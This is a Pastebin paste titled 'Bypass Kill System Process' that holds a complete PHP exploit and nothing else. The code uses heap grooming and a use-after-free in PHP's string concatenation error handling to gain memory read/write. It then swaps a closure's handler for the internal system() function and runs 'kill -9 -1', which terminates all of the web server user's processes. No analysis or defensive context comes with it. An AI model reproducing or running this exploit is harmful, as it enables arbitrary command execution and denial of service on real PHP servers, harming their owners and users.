Advertisement
willysec_id

Bypass Kill System Process

Jan 4th, 2024
1,188
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.10 KB | Cybersecurity | 1 0
  1. <?php
  2. opcache_reset();
  3. new Pwn("kill -9 -1");
  4.  
  5. class Helper { public $a, $b, $c; }
  6. class Pwn {
  7.     const LOGGING = false;
  8.     const CHUNK_DATA_SIZE = 0x60;
  9.     const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE;
  10.     const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1;
  11.  
  12.     const HT_SIZE = 0x118;
  13.     const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1;
  14.  
  15.     public function __construct($cmd) {
  16.         for($i = 0; $i < 10; $i++) {
  17.             $groom[] = self::alloc(self::STRING_SIZE);
  18.             $groom[] = self::alloc(self::HT_STRING_SIZE);
  19.         }
  20.        
  21.         $concat_str_addr = self::str2ptr($this->heap_leak(), 16);
  22.         $fill = self::alloc(self::STRING_SIZE);
  23.  
  24.         $this->abc = self::alloc(self::STRING_SIZE);
  25.         $abc_addr = $concat_str_addr + self::CHUNK_SIZE;
  26.         self::log("abc @ 0x%x", $abc_addr);
  27.  
  28.         $this->free($abc_addr);
  29.         $this->helper = new Helper;
  30.         if(strlen($this->abc) < 0x1337) {
  31.             self::log("uaf failed");
  32.             return;
  33.         }
  34.  
  35.         $this->helper->a = "leet";
  36.         $this->helper->b = function($x) {};
  37.         $this->helper->c = 0xfeedface;
  38.  
  39.         $helper_handlers = $this->rel_read(0);
  40.         self::log("helper handlers @ 0x%x", $helper_handlers);
  41.  
  42.         $closure_addr = $this->rel_read(0x20);
  43.         self::log("real closure @ 0x%x", $closure_addr);
  44.  
  45.         $closure_ce = $this->read($closure_addr + 0x10);
  46.         self::log("closure class_entry @ 0x%x", $closure_ce);
  47.        
  48.         $basic_funcs = $this->get_basic_funcs($closure_ce);
  49.         self::log("basic_functions @ 0x%x", $basic_funcs);
  50.  
  51.         $zif_system = $this->get_system($basic_funcs);
  52.         self::log("zif_system @ 0x%x", $zif_system);
  53.  
  54.         $fake_closure_off = 0x70;
  55.         for($i = 0; $i < 0x138; $i += 8) {
  56.             $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i));
  57.         }
  58.         $this->rel_write($fake_closure_off + 0x38, 1, 4);
  59.         $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
  60.         $this->rel_write($fake_closure_off + $handler_offset, $zif_system);
  61.  
  62.         $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18;
  63.         self::log("fake closure @ 0x%x", $fake_closure_addr);
  64.  
  65.         $this->rel_write(0x20, $fake_closure_addr);
  66.         ($this->helper->b)($cmd);
  67.  
  68.         $this->rel_write(0x20, $closure_addr);
  69.         unset($this->helper->b);
  70.     }
  71.  
  72.     private function heap_leak() {
  73.         $arr = [[], []];
  74.         set_error_handler(function() use (&$arr, &$buf) {
  75.             $arr = 1;
  76.             $buf = str_repeat("\x00", self::HT_STRING_SIZE);
  77.         });
  78.         $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array"));
  79.         return $buf;
  80.     }
  81.  
  82.     private function free($addr) {
  83.         $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr);
  84.         $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload));
  85.        
  86.         $arr = [[], []];
  87.         set_error_handler(function() use (&$arr, &$buf, &$payload) {
  88.             $arr = 1;
  89.             $buf = str_repeat($payload, 1);
  90.         });
  91.         $arr[1] .= "x";
  92.     }
  93.  
  94.     private function rel_read($offset) {
  95.         return self::str2ptr($this->abc, $offset);
  96.     }
  97.  
  98.     private function rel_write($offset, $value, $n = 8) {
  99.         for ($i = 0; $i < $n; $i++) {
  100.             $this->abc[$offset + $i] = chr($value & 0xff);
  101.             $value >>= 8;
  102.         }
  103.     }
  104.  
  105.     private function read($addr, $n = 8) {
  106.         $this->rel_write(0x10, $addr - 0x10);
  107.         $value = strlen($this->helper->a);
  108.         if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
  109.         return $value;
  110.     }
  111.  
  112.     private function get_system($basic_funcs) {
  113.         $addr = $basic_funcs;
  114.         do {
  115.             $f_entry = $this->read($addr);
  116.             $f_name = $this->read($f_entry, 6);
  117.             if($f_name === 0x6d6574737973) {
  118.                 return $this->read($addr + 8);
  119.             }
  120.             $addr += 0x20;
  121.         } while($f_entry !== 0);
  122.     }
  123.  
  124.     private function get_basic_funcs($addr) {
  125.         while(true) {
  126.             $addr -= 0x10;
  127.             if($this->read($addr, 4) === 0xA8 &&
  128.                 in_array($this->read($addr + 4, 4),
  129.                     [20180731, 20190902, 20200930, 20210902])) {
  130.                 $module_name_addr = $this->read($addr + 0x20);
  131.                 $module_name = $this->read($module_name_addr);
  132.                 if($module_name === 0x647261646e617473) {
  133.                     self::log("standard module @ 0x%x", $addr);
  134.                     return $this->read($addr + 0x28);
  135.                 }
  136.             }
  137.         }
  138.     }
  139.  
  140.     private function log($format, $val = "") {
  141.         if(self::LOGGING) {
  142.             printf("{$format}\n", $val);
  143.         }
  144.     }
  145.  
  146.     static function alloc($size) {
  147.         return str_shuffle(str_repeat("A", $size));
  148.     }
  149.  
  150.     static function str2ptr($str, $p = 0, $n = 8) {
  151.         $address = 0;
  152.         for($j = $n - 1; $j >= 0; $j--) {
  153.             $address <<= 8;
  154.             $address |= ord($str[$p + $j]);
  155.         }
  156.         return $address;
  157.     }
  158. }
  159.  
  160. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement